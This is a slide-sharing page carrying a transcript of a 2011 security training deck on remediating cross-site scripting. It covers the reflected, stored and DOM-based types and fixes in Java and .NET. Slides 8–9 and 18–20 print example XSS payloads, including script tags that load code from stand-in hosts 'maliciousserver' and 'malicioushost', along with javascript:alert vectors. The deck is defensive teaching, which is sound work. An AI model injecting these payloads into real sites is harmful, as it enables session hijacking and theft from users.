AppSec in a World of Digital TransformationAppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation
 
The As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native ApplicationsThe As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native Applications
 
Enabling Developers in Your Application Security Program With Coverity and Th...
Enabling Developers in Your Application Security Program With Coverity and Th...Enabling Developers in Your Application Security Program With Coverity and Th...
Enabling Developers in Your Application Security Program With Coverity and Th...
 
AppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation AppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation
 
Enumerating Enterprise Attack Surface
Enumerating Enterprise Attack SurfaceEnumerating Enterprise Attack Surface
Enumerating Enterprise Attack Surface
 

Último

Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 

Último (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 

XSS Remediation

  • 1. Cross-Site Scripting (XSS) Remediation Guerilla Training Camp Security BSides Austin Dan Cornell © Copyright 2011 Denim Group - All Rights Reserved
  • 2. My Background • Dan Cornell, founder and CTO of Denim Group • Software developer by background (Java, .NET, etc) • OWASP San Antonio, Global Membership Committee • Denim Group – Build software with special security, performance, reliability requirements – Help organizations deal with the risk associated with their software • Code reviews and application assessments • SDLC consulting • Secure development training – instructor-led and eLearning © Copyright 2011 Denim Group - All Rights Reserved 1
  • 3. Agenda • What is Cross-Site Scripting (XSS)? • How Do You Remediate XSS Vulnerabilities? • Questions © Copyright 2011 Denim Group - All Rights Reserved 2
  • 4. Vulnerability: Cross-Site Scripting #2 in the OWASP Top 10 If an attacker controls your browser – it is no longer your browser © Copyright 2011 Denim Group - All Rights Reserved 3
  • 5. Let's look at a simple application Web Application Web Browser Administrative Pages Administrator Database Web Browser User Pages Attacker © Copyright 2011 Denim Group - All Rights Reserved 4
  • 6. A standard user can update the name and email address on their profile: NormalGuy normalguy@normalmail.com An administrative user can retrieve this information, shown in a page: <input type="text" name="name" value="NormalGuy"><br> <input type="text" name="email" value="normalguy@normalmail.com"> © Copyright 2011 Denim Group - All Rights Reserved 5
  • 7. With normal input <input type=”text” name=”name” value=”NormalGuy”><br> <input type=”text” name=”email” value=” normalguy@normalmail.com”> Web Browser Administrative Pages Administrator Database Web Browser User Pages NormalGuy User normalguy@normalmail.com © Copyright 2011 Denim Group - All Rights Reserved 6
  • 8. A malicious user can inject malicious scripts into their profile: MaliciousGuy "><script src="http://maliciousserver/rewritepage.js" /> When the administrative user retrieves this information: <input type="text" name="name" value="NormalGuy"><br> <input type="text" name="email" value=" "><script src="http://maliciousserver/rewritepage.js" />"> © Copyright 2011 Denim Group - All Rights Reserved 7
  • 9. With malicious input <input type=”text” name=”name” value=”MaliciousGuy”><br> <input type=”text” name=”email” value=””><script src=”http://maliciousserver/rewritepage.js” />”> Web Browser Administrative Pages Administrator Database Web Browser User Pages Attacker MaliciousGuy ”><script src=”http://maliciousserver/rewritepage.js” /> © Copyright 2011 Denim Group - All Rights Reserved 8
  • 10. What is Cross-Site Scripting? • Occurs when an application takes data from a user and sends it back to a web browser without validation or encoding • Victim's browser renders HTML and executes JavaScript chosen by the Attacker • Not a direct attack on the application – it is attack on users of the application – Exploitation can involve many scenarios including social engineering • Most common web application security issue – Based on MITRE statistics © Copyright 2011 Denim Group - All Rights Reserved 9
  • 11. Impact of Cross-Site Scripting What can an attacker accomplish with a malicious script? © Copyright 2011 Denim Group - All Rights Reserved 10
  • 12. Cross-Site Scripting Attacks • Attackers may have different means to have their code to execute on another user’s browser • Reflected • Stored • DOM Based © Copyright 2011 Denim Group - All Rights Reserved 11
  • 13. Reflected Cross-Site Scripting • Attacker crafts a malicious link containing the payload • Attacker makes that link available for victims to click • Victim encounters malicious link and clicks • Web application reflects the payload back to the victim's browser where it is rendered and executed • Commonly found in – Login pages – Message pages © Copyright 2011 Denim Group - All Rights Reserved 12
  • 14. Reflected Cross-Site Scripting Malicious Web Attacker User Web Application Server Send e-mail to user with link Link makes request to website Response includes malicious content Malicious content sends authentication information to attacker’s resources or Malicious content redirects user to malicious website © Copyright 2011 Denim Group - All Rights Reserved 13
  • 15. Stored Cross-Site Scripting • Attacker posts payload to a database or other data store • Victim uses the same site and visits a page where the payload is sent back to the victim • The payload is rendered and executed in the browser • Commonly found in – Message boards (horizontal privilege escalation) – User management systems (vertical privilege escalation) © Copyright 2011 Denim Group - All Rights Reserved 14
  • 16. Stored Cross-Site Scripting Attacker Web Application User Submit field with malicious content Request for content to approve Reply containing malicious content © Copyright 2011 Denim Group - All Rights Reserved 15
  • 17. DOM-based Cross-Site Scripting • Attacker crafts a malicious link containing the payload • Attacker makes that link available for victims to click • Victim encounters malicious link and clicks • Client-side code parses user-supplied data to make decisions • Things to look for – document.URL – document.URLUnencoded – document.location (and its other properties) – Document.referrer – window.location (and its other properties) © Copyright 2011 Denim Group - All Rights Reserved 16
  • 18. Crafting XSS Payloads • Most basic, if payload is echoed directly into open HTML – <script>alert('hi');</script> • Sometimes you may have to deal with application HTML – <input name='uname' value='<%= Request["uname"] %>' /> – uname parameter must: • Close out the value attribute: '> • Then include the payload: <script>alert('hi');</script> • Then clean up before the application HTML starts again: <' • Full payload: '><script>alert('hi');</script><' © Copyright 2011 Denim Group - All Rights Reserved 17
  • 19. Crafting XSS Payloads Script with the 'src' attribute <SCRIPT SRC=http://malicioushost/maliciousscript.js></SCRIPT> An attacker is likely to use the 'src' attribute if the script requires more space than the application accommodates. Image <IMG SRC="javascript:alert('XSS');"> Body <BODY BACKGROUND="javascript:alert('XSS')"> © Copyright 2011 Denim Group - All Rights Reserved 18
  • 20. Crafting XSS Payloads Input <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> Iframe <IFRAME SRC="javascript:alert('XSS');"></IFRAME> In addition, the iframe can point to a malicious page on a remote host. Table <TABLE BACKGROUND="javascript:alert('XSS')"> Div <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> © Copyright 2011 Denim Group - All Rights Reserved 19
  • 21. Impact • Attacker can render HTML and execute script in the victim's browser, resulting in: – Session hijacking (adding JavaScript that forwards cookies to an attacker) – Misinformation (adding "For more info call 1-800-A-BAD-GUY" to a page) – Defacing web site (adding "This company is terrible!!!" to a page) – Inserting hostile content (adding malicious ActiveX controls to a page) – Phishing attacks (adding login FORM posts to 3rd party sites) – Takeover of the user's browser (adding JavaScript code to redirect the user) © Copyright 2011 Denim Group - All Rights Reserved 20
  • 22. Mitigation • Positively validate inputs – Length, type, syntax, business rules • Encode application outputs – HTML or XML – < becomes &lt; and so on © Copyright 2011 Denim Group - All Rights Reserved 21
  • 23. Java-specific Safeguards • Avoid using <%= %> because that does not encode outputs • Escape special HTML characters – < > ' " / & and so on… • Use URLEncoder class to encode characters being placed in a URL • Use Struts output mechanisms such as <bean:write …> • User JSTL escapeXML="true" attribute in <c:out …> • Use ESAPI Encoders © Copyright 2011 Denim Group - All Rights Reserved 22
  • 24. .NET-specific Safeguards • .NET has built-in blacklist validation against many known XSS attacks – This is good, but not ideal – This can be turned off with ValidateRequest="false" in the Page tag (BAD!) • Validation framework offers many protection options – RegExValidator and others • Avoid using <%= %> because that does not encode outputs – Look at <%: %> syntax in ASP.NET 4 – http://weblogs.asp.net/scottgu/archive/2010/04/06/new-lt-gt-syntax-for-html- encoding-output-in-asp-net-4-and-asp-net-mvc-2.aspx • Better: Use HttpUtility.HtmlEncode() to encode user-supplied data that is reflected back to users • Best: Microsoft Web Protection Library (WPL) – http://wpl.codeplex.com/ © Copyright 2011 Denim Group - All Rights Reserved 23
  • 25. Cross-Site Scripting Recap • Cross-Site Scripting (XSS) occurs when an application takes data from a user and sends it back to a web browser without validation or encoding • There are three main varieties: – Stored – Reflected – DOM-based • To guard against: – Positively validate inputs – Escape user-supplied data sent back to the browser © Copyright 2011 Denim Group - All Rights Reserved 24
  • 26. OWASP ESAPI • Sites: – Main: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API – Java: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=Java_EE • Good: Provides very robust set of encoder functions • Less good: – Has a number of dependencies (~29) (currently – work on modularity is in progress) – Implementations are of varying maturity. Most useful for Java. © Copyright 2011 Denim Group - All Rights Reserved 25
  • 27. OWASP ESAPI (Java) • To Use: – Follow the installation guide – Must create a folder (.esapi) to store your configuration and preferences • Get access to library: – Add all the support jars (31) to your project – Remove repeated jars – Add esapi-2.0_rc10.jar to your project <%@ page import="org.owasp.esapi.ESAPI, org.owasp.esapi.Encoder" %> • Make calls to encode tainted data: – ESAPI.encoder().encodeForHTML() – ESAPI.encoder().encodeForHTMLAttribute() © Copyright 2011 Denim Group - All Rights Reserved 26
  • 28. ASP.NET Request Validation • ASP.NET provides some blacklist-based input validation to try and guard against HTML injection and cross-site scripting (XSS) attacks • This is turned on by default (yeah!) • Many applications disable it (boo!) – Blocked a valid request – Made trouble with AJAX – And so on © Copyright 2011 Denim Group - All Rights Reserved 27
  • 29. ASP.NET Request Validation • How to configure or check if it is enabled? • This is turned on by default • In web.config: <configuration> <system.web> <pages validateRequest=“true|false" /> </system.web> </configuration> • Per-page: <%@ Page … ValidateRequest=“true|false" %> © Copyright 2011 Denim Group - All Rights Reserved 28
  • 30. Microsoft Web Protection Library • Main site: – http://wpl.codeplex.com/ • To use: – Import reference to AntiXSS.dll (optionally include HtmlSanitizationLibrary.dll) • Found in C:Program Files (x86)Microsoft Information SecurityAntiXSS Library v4.0 – Get access to library: • In code: – using Microsoft.Security.Application; • In ASPX page: – <%@ Import Namespace="Microsoft.Security.Application" %> – Make call to encode tainted data: • AntiXss.HtmlEncode() • AntiXss.HtmlAttributeEncode() • And so on… © Copyright 2011 Denim Group - All Rights Reserved 29
  • 31. Exercise: Fixing XSS Vulnerabilities • Java – Reflected XSS – Stored XSS • ASP.NET – Reflected XSS – Stored XSS © Copyright 2011 Denim Group - All Rights Reserved 30
  • 32. But Your ASP.NET Examples Cheated! • This is true: ASP.NET provides some XSS protection via the ValidateRequest functionality • However: – This can be (and is often) turned off on a per-page or site-wide basis – It has been defeated in the past and will be defeated again in the future • http://www.procheckup.com/vulnerability_manager/documents/document_1258758664/byp assing-dot-NET-ValidateRequest.pdf • http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava- FavoriteXSS-SLIDES.pdf • If you want your code to be “Rugged” then you need to actually guard against cross-site scripting vulnerabilities in your code © Copyright 2011 Denim Group - All Rights Reserved 31
  • 33. Resources • OWASP ESAPI – http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API • Microsoft Web Protection Library – http://wpl.codeplex.com/ • Denim Group Remediation Resource Center – www.denimgroup.com/remediation © Copyright 2011 Denim Group - All Rights Reserved 32
  • 34. Questions? Dan Cornell dan@denimgroup.com Twitter: @danielcornell www.denimgroup.com (210) 572-4400 © Copyright 2011 Denim Group - All Rights Reserved 33